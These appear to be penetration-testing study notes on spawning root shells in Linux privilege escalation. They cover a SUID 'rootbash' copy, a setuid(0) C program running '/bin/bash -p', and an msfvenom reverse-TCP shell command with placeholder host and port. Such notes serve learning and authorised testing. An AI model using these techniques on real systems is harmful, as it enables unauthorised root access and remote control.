# Spawning Root Shells ### "rootbash" SUID - Create a copy of the /bin/bash executable file (name it rootbash for fun), make sure its owned by the root user, and has the SUID bit set. - A root shell can be spawned by simply executing the rootbash file with the -p command line option. - The benefit of this method is it is persistent (once the exploit is run, rootbash can be used multiple times). ### Custom Executable There may be instances where some root process executes another process which you can control, In these cases, the following C code, once compiled, will spawn a bash shell running as root: ```c int main() { setuid(0); system("/bin/bash -p"); } ``` Compile using the following code: ```bash $ gcc -o <name> <filename.c> ``` ### msfvenom If a reverse shell is preferred, msfvenom can be used to generate an executable (elf) file: ```bash $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf ``` The reverse shell can be caught using netcat or Metasploit's own multi/handler. ### Native Reverse Shells There are multiple ways to spawn reverse shells natively on may Linux distributions. A good tool for suggesting these is: https://github.com/mthbernardes/rsg All can be caught using a netcat listener.